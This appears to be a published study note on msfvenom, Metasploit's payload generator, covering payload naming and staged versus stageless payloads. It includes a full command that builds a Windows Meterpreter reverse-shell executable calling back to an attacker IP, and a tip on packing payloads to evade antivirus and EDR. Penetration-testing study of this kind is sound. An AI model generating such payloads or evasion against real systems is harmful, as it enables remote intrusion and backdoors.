msfvenom - CastleDefender - Obsidian Publish

# msfvenom Tags: #msfvenom #payloads #Metasploit #Meterpreter Links: --- ## **Definition:** **msfvenom** is a powerful [[Payloads|payload]] generation tool that's part of the **Metasploit Framework**. It combines the functionality of `msfpayload` and `msfencode` (now deprecated) into one utility, allowing attackers and red teamers to **generate shellcode, encode it, and package it into various formats**—like executables, scripts, or even Office macros. --- ## **What It Does:** - Generates **payloads** for different platforms (Windows, Linux, macOS, Android, etc.) - Supports **staged** and **stageless** payloads - Allows **encoding** payloads to bypass antivirus or filters - Outputs to multiple formats (EXE, DLL, ELF, APK, ASP, PS1, etc.) --- ## **Naming Convention Format:** `<platform>/<payload_type>/<communication_method>` or `<OS>/<arch>/<payload>` **Breakdown:** - **Platform**: OS the payload targets (`windows`, `linux`, `android`, `osx`, `php`, etc.) - **Payload Type**: Shell or Meterpreter (`shell`, `meterpreter`, etc.) - **Comm. Method**: How it connects (`reverse_tcp`, `bind_tcp`, `reverse_http`, etc.) **Examples:** - `windows/meterpreter/reverse_tcp` – staged reverse shell using Meterpreter - `linux/x86/shell_bind_tcp` – stageless bind shell for Linux - `windows/shell_reverse_tcp` - Windows 32bit targets don't need to specify the arch. - `android/meterpreter/reverse_http` – Meterpreter payload for Android using HTTP - `osx/x64/shell_reverse_tcp` – reverse shell payload for macOS ## Staged vs Stageless In the above examples the payload used was `shell_reverse_tcp`. This indicates that it was a _stageless_ payload. How? Stageless payloads are denoted with underscores (`_`). The staged equivalent to this payload would be: `shell/reverse_tcp` The same can be said for Meterpreter payloads `windows/x64/meterpreter/reverse_tcp` --- ## **Example Use** `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o payload.exe` **Flags Explained:** - `-p`: Payload name - `LHOST`: Attacker's IP address - `LPORT`: Listening port - `-f`: Format (exe, elf, raw, etc.) - `-o`: Output file `msfvenom --list payloads` can be used to list all available payloads, which can be piped into grep when searching for specific payloads. --- ## **Why It Matters:** msfvenom is essential in red teaming and penetration testing for crafting custom payloads tailored to specific exploits or evasion strategies. ## **Risks (if abused):** - Malware creation - Remote access backdoors - Antivirus evasion --- **Pro Tip:** Combine with **obfuscation**, **packers**, or **custom loaders** to bypass modern EDR/AV. ---